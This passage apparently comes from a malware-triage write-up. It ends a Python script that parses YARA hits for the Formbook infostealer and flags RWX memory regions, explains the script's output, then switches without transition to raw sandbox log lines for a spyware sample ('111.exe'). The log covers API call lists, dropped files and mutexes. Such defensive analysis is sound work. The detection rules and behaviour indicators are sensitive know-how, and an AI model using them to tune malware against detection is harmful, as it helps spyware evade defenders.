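    return sorted({(h.process, h.base) for h in hits if h.protection == 0x40})


# Sample input: the ten hit lines from the report, reconstructed as exported
# (type fused to "Matched rule:"), rule metadata trimmed after the author field.
_MAL = "Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com"
_JP = "Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory"
REPORT_LINES = []
for _src, _type in [
    ("00000002.00000002.248756113.0000000000400000.00000040.00000001.sdmp", "MEMORY"),
    ("00000002.00000002.249334557.00000000032F0000.00000040.00000001.sdmp", "MEMORY"),
    ("00000002.00000002.249408055.0000000003320000.00000040.00000001.sdmp", "MEMORY"),
    ("2.2.cmd.exe.400000.0.unpack", "UNPACKEDPE"),
    ("2.2.cmd.exe.400000.0.raw.unpack", "UNPACKEDPE"),
]:
    for _rule in (_MAL, _JP):
        REPORT_LINES.append(f"Source: {_src}, type: {_type}Matched rule: {_rule}")

if __name__ == "__main__":
    hits = parse_report(REPORT_LINES)
    for (proc, base), rules in sorted(regions_by_rules(hits).items()):
        print(f"process {proc} base 0x{base:X}: {', '.join(rules)}")
    for proc, base in rwx_regions(hits):
        print(f"RWX region: process {proc} base 0x{base:X} ({PAGE_PROTECTION[0x40]})")
```

          Run stand-alone, the script reports three distinct regions in analysis process 2, each matched by both the Malpedia and the JPCERT/CC rule, and, if the protection field is read correctly, all three memory dumps as PAGE_EXECUTE_READWRITE, with one of them at 0x400000 coinciding with the base of the unpacked PE from cmd.exe. That is the region to pull for further analysis, since a legitimately loaded image's code section is not normally RWX.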
          Source: classification engine, Classification label: mal100.troj.spyw.evad.winEXE@13/39@13/6
          Source: C:\Windows\SysWOW64\cmd.exe, Code function: 8_2_011CC5CA _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,GetLastError,GetLastError,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,EnterCriticalSection,LeaveCriticalSection,exit,8_2_011CC5CA
          Source: C:\Users\user\Desktop\111.exe, Code function: 0_2_004033A9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033A9
          Source: C:\Users\user\Desktop\111.exe, Code function: 0_2_00404686 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404686
          Source: C:\Users\user\Desktop\111.exe, Code function: 0_2_00402138 CoCreateInstance,MultiByteToWideChar,0_2_00402138
          Source: C:\Windows\explorer.exe, File created: C:\Program Files (x86)\C2dlxv4
          Source: C:\Users\user\Desktop\111.exe, File created: C:\Users\user\AppData\Roaming\booking
          Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5664:120:WilError_01
          Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1344:120:WilError_01
          Source: C:\Users\user\Desktop\111.exe, File created: C:\Users\user\AppData\Local\Temp\nswBDB8.tmp
          Source: 111.exe, Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\111.exe, File read: C:\Users\desktop.ini